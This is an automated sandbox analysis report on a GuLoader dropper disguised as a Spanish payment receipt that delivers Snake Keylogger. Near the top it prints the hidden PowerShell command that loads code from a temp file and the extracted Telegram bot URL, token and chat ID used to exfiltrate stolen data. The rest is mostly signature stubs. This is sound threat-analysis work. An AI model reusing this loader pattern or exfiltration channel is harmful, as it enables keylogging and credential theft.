Windows
Analysis Report
Justificante pago-09453256434687.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Justificante pago-09453256434687.exe (PID: 7460 cmdline:
"C:\Users\ user\Deskt op\Justifi cante pago -094532564 34687.exe" MD5: 4252CD5753DEF4A484FB3313E1029E66) - powershell.exe (PID: 7528 cmdline:
powershell .exe -wind owstyle hi dden "$Sub wayed=gc - raw 'C:\Us ers\user\A ppData\Loc al\Temp\gl obosely\ba adehavn\st nner\Forha andsudtale lses.Pot16 2';$Raadsl agningens= $Subwayed. SubString( 68150,3);. $Raadslagn ingens($Su bwayed) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - msiexec.exe (PID: 8012 cmdline:
"C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"C2 url": "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM", "Chat_id": "5234817354", "Version": "4.4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-16T18:28:56.968822+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | TCP |
2024-12-16T18:29:13.174013+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49781 | 104.21.67.152 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-16T18:28:52.347535+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP |
2024-12-16T18:28:55.285176+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP |
2024-12-16T18:28:58.363210+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-16T18:28:44.726551+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 172.217.19.174 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Code function: | 6_2_240187A8 | |
Source: | Code function: | 6_2_24018EF1 |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00405C13 | |
Source: | Code function: | 0_2_0040683D | |
Source: | Code function: | 0_2_0040290B |
Source: | Code function: | 6_2_0307F2C0 | |
Source: | Code function: | 6_2_0307F4AC | |
Source: | Code function: | 6_2_0307F974 | |
Source: | Code function: | 6_2_21A52DC8 | |
Source: | Code function: | 6_2_21A52968 | |
Source: | Code function: | 6_2_21A50B30 | |
Source: | Code function: | 6_2_21A50B30 | |
Source: | Code function: | 6_2_21A5D9A8 | |
Source: | Code function: | 6_2_21A52DB8 | |
Source: | Code function: | 6_2_21A5310E | |
Source: | Code function: | 6_2_21A5D550 | |
Source: | Code function: | 6_2_21A5CCA0 | |
Source: | Code function: | 6_2_21A5D0F8 | |
Source: | Code function: | 6_2_21A5F810 | |
Source: | Code function: | 6_2_21A50040 | |
Source: | Code function: | 6_2_21A50853 | |
Source: | Code function: | 6_2_21A5F3B8 | |
Source: | Code function: | 6_2_21A5EB08 | |
Source: | Code function: | 6_2_21A5EF60 | |
Source: | Code function: | 6_2_21A5E6B0 | |
Source: | Code function: | 6_2_21A5DE00 | |
Source: | Code function: | 6_2_21A50673 | |
Source: | Code function: | 6_2_21A5E258 | |
Source: | Code function: | 6_2_24017B78 | |
Source: | Code function: | 6_2_2401B7A8 | |
Source: | Code function: | 6_2_24018FB0 | |
Source: | Code function: | 6_2_24013008 | |
Source: | Code function: | 6_2_2401DC28 | |
Source: | Code function: | 6_2_24016030 | |
Source: | Code function: | 6_2_2401BC38 | |
Source: | Code function: | 6_2_24010040 | |
Source: | Code function: | 6_2_24013460 | |
Source: | Code function: | 6_2_2401B081 | |
Source: | Code function: | 6_2_24016488 | |
Source: | Code function: | 6_2_24010498 | |
Source: | Code function: | 6_2_2401E0B8 | |
Source: | Code function: | 6_2_2401C0C8 | |
Source: | Code function: | 6_2_240108F0 | |
Source: | Code function: | 6_2_2401E548 | |
Source: | Code function: | 6_2_24010D48 | |
Source: | Code function: | 6_2_2401C558 | |
Source: | Code function: | 6_2_240111A0 | |
Source: | Code function: | 6_2_2401E9D8 | |
Source: | Code function: | 6_2_2401C9E8 | |
Source: | Code function: | 6_2_240115F8 | |
Source: | Code function: | 6_2_24016A18 | |
Source: | Code function: | 6_2_24014620 | |
Source: | Code function: | 6_2_24011A50 | |
Source: | Code function: | 6_2_2401EE68 | |
Source: | Code function: | 6_2_24016E70 | |
Source: | Code function: | 6_2_2401CE78 | |
Source: | Code function: | 6_2_24014A78 | |
Source: | Code function: | 6_2_24011EA8 | |
Source: | Code function: | 6_2_240172C8 | |
Source: | Code function: | 6_2_24014ED0 | |
Source: | Code function: | 6_2_2401F2F8 | |
Source: | Code function: | 6_2_24012300 | |
Source: | Code function: | 6_2_2401D308 | |
Source: | Code function: | 6_2_2401B318 | |
Source: | Code function: | 6_2_24017720 | |
Source: | Code function: | 6_2_24015328 | |
Source: | Code function: | 6_2_24012758 | |
Source: | Code function: | 6_2_24015780 | |
Source: | Code function: | 6_2_2401F788 | |
Source: | Code function: | 6_2_2401D798 | |
Source: | Code function: | 6_2_24012BB0 | |
Source: | Code function: | 6_2_24015BD8 |
Networking |
---|
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004056A8 |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_004034F7 |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00406BFE | |
Source: | Code function: | 6_2_03075362 | |
Source: | Code function: | 6_2_0307D278 | |
Source: | Code function: | 6_2_0307C147 | |
Source: | Code function: | 6_2_0307C738 | |
Source: | Code function: | 6_2_0307C468 | |
Source: | Code function: | 6_2_0307CA08 | |
Source: | Code function: | 6_2_0307E988 | |
Source: | Code function: | 6_2_0307CFAC | |
Source: | Code function: | 6_2_03073E09 | |
Source: | Code function: | 6_2_0307CCD8 | |
Source: | Code function: | 6_2_03077118 | |
Source: | Code function: | 6_2_0307F974 | |
Source: | Code function: | 6_2_0307E97C | |
Source: | Code function: | 6_2_030729EC | |
Source: | Code function: | 6_2_03079DE0 | |
Source: | Code function: | 6_2_21A52968 | |
Source: | Code function: | 6_2_21A59C18 | |
Source: | Code function: | 6_2_21A5FC68 | |
Source: | Code function: | 6_2_21A517A0 | |
Source: | Code function: | 6_2_21A59328 | |
Source: | Code function: | 6_2_21A50B30 | |
Source: | Code function: | 6_2_21A51E80 | |
Source: | Code function: | 6_2_21A5D9A8 | |
Source: | Code function: | 6_2_21A5D999 | |
Source: | Code function: | 6_2_21A5DDF1 | |
Source: | Code function: | 6_2_21A5D540 | |
Source: | Code function: | 6_2_21A59548 | |
Source: | Code function: | 6_2_21A5D550 | |
Source: | Code function: | 6_2_21A5CCA0 | |
Source: | Code function: | 6_2_21A5CC8F | |
Source: | Code function: | 6_2_21A5D0E8 | |
Source: | Code function: | 6_2_21A5D0F8 | |
Source: | Code function: | 6_2_21A55028 | |
Source: | Code function: | 6_2_21A5F805 | |
Source: | Code function: | 6_2_21A5F810 | |
Source: | Code function: | 6_2_21A50012 | |
Source: | Code function: | 6_2_21A55018 | |
Source: | Code function: | 6_2_21A50040 | |
Source: | Code function: | 6_2_21A58BA0 | |
Source: | Code function: | 6_2_21A5F3A8 | |
Source: | Code function: | 6_2_21A5F3B8 | |
Source: | Code function: | 6_2_21A5178F | |
Source: | Code function: | 6_2_21A58B91 | |
Source: | Code function: | 6_2_21A50B20 | |
Source: | Code function: | 6_2_21A5EB08 | |
Source: | Code function: | 6_2_21A5EF60 | |
Source: | Code function: | 6_2_21A5EF51 | |
Source: | Code function: | 6_2_21A5E6A0 | |
Source: | Code function: | 6_2_21A5E6B0 | |
Source: | Code function: | 6_2_21A5EAF8 | |
Source: | Code function: | 6_2_21A5DE00 | |
Source: | Code function: | 6_2_21A51E70 | |
Source: | Code function: | 6_2_21A5E257 | |
Source: | Code function: | 6_2_21A5E258 | |
Source: | Code function: | 6_2_240181D0 | |
Source: | Code function: | 6_2_24017B78 | |
Source: | Code function: | 6_2_2401B7A8 | |
Source: | Code function: | 6_2_24018FB0 | |
Source: | Code function: | 6_2_24013008 | |
Source: | Code function: | 6_2_2401DC19 | |
Source: | Code function: | 6_2_2401FC18 | |
Source: | Code function: | 6_2_24016024 | |
Source: | Code function: | 6_2_2401DC28 | |
Source: | Code function: | 6_2_2401BC2A | |
Source: | Code function: | 6_2_24016030 | |
Source: | Code function: | 6_2_2401BC38 | |
Source: | Code function: | 6_2_24010040 | |
Source: | Code function: | 6_2_24013450 | |
Source: | Code function: | 6_2_24013460 | |
Source: | Code function: | 6_2_24016478 | |
Source: | Code function: | 6_2_24016488 | |
Source: | Code function: | 6_2_24010498 | |
Source: | Code function: | 6_2_2401E0A7 | |
Source: | Code function: | 6_2_2401C0B7 | |
Source: | Code function: | 6_2_2401E0B8 | |
Source: | Code function: | 6_2_240138B8 | |
Source: | Code function: | 6_2_2401C0C8 | |
Source: | Code function: | 6_2_240108F0 | |
Source: | Code function: | 6_2_2401A928 | |
Source: | Code function: | 6_2_2401A938 | |
Source: | Code function: | 6_2_2401E538 | |
Source: | Code function: | 6_2_2401C548 | |
Source: | Code function: | 6_2_2401E548 | |
Source: | Code function: | 6_2_24010D48 | |
Source: | Code function: | 6_2_2401C558 | |
Source: | Code function: | 6_2_2401119F | |
Source: | Code function: | 6_2_240111A0 | |
Source: | Code function: | 6_2_2401E9C8 | |
Source: | Code function: | 6_2_2401C9D8 | |
Source: | Code function: | 6_2_2401E9D8 | |
Source: | Code function: | 6_2_240115E8 | |
Source: | Code function: | 6_2_2401C9E8 | |
Source: | Code function: | 6_2_240115F8 | |
Source: | Code function: | 6_2_24016A07 | |
Source: | Code function: | 6_2_24016A18 | |
Source: | Code function: | 6_2_24014620 | |
Source: | Code function: | 6_2_24014622 | |
Source: | Code function: | 6_2_24011A4F | |
Source: | Code function: | 6_2_24011A50 | |
Source: | Code function: | 6_2_2401EE57 | |
Source: | Code function: | 6_2_2401CE67 | |
Source: | Code function: | 6_2_2401EE68 | |
Source: | Code function: | 6_2_24016E70 | |
Source: | Code function: | 6_2_24014A70 | |
Source: | Code function: | 6_2_24016E72 | |
Source: | Code function: | 6_2_2401CE78 | |
Source: | Code function: | 6_2_24014A78 | |
Source: | Code function: | 6_2_24011E98 | |
Source: | Code function: | 6_2_24011EA8 | |
Source: | Code function: | 6_2_240172C8 | |
Source: | Code function: | 6_2_240172CA | |
Source: | Code function: | 6_2_24014ECC | |
Source: | Code function: | 6_2_24014ED0 | |
Source: | Code function: | 6_2_2401F2E7 | |
Source: | Code function: | 6_2_240122F0 | |
Source: | Code function: | 6_2_2401D2F7 | |
Source: | Code function: | 6_2_2401F2F8 | |
Source: | Code function: | 6_2_24012300 | |
Source: | Code function: | 6_2_2401B307 | |
Source: | Code function: | 6_2_2401D308 | |
Source: | Code function: | 6_2_2401B318 | |
Source: | Code function: | 6_2_24017720 | |
Source: | Code function: | 6_2_24017722 | |
Source: | Code function: | 6_2_24015328 | |
Source: | Code function: | 6_2_24012748 | |
Source: | Code function: | 6_2_24012758 | |
Source: | Code function: | 6_2_24017B69 | |
Source: | Code function: | 6_2_24015777 | |
Source: | Code function: | 6_2_2401F778 | |
Source: | Code function: | 6_2_24015780 | |
Source: | Code function: | 6_2_2401D787 | |
Source: | Code function: | 6_2_2401F788 | |
Source: | Code function: | 6_2_2401B798 | |
Source: | Code function: | 6_2_2401D798 | |
Source: | Code function: | 6_2_24018FA1 | |
Source: | Code function: | 6_2_24012BA0 | |
Source: | Code function: | 6_2_24012BB0 | |
Source: | Code function: | 6_2_24015BD8 | |
Source: | Code function: | 6_2_24012FF9 |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_004034F7 |
Source: | Code function: | 0_2_00404954 |
Source: | Code function: | 0_2_004021AA |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 1_2_00D1A6B1 | |
Source: | Code function: | 1_2_00D1A6B1 | |
Source: | Code function: | 1_2_00D1EA2C | |
Source: | Code function: | 1_2_070A4379 | |
Source: | Code function: | 1_2_070A0FC7 | |
Source: | Code function: | 1_2_08FB56B4 | |
Source: | Code function: | 1_2_08FB6C45 | |
Source: | Code function: | 1_2_08FB5E0C | |
Source: | Code function: | 1_2_08FB3D97 | |
Source: | Code function: | 1_2_08FB3D97 | |
Source: | Code function: | 6_2_042E6C45 | |
Source: | Code function: | 6_2_042E3D97 | |
Source: | Code function: | 6_2_042E3D97 | |
Source: | Code function: | 6_2_042E5E0C | |
Source: | Code function: | 6_2_042E56B4 |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
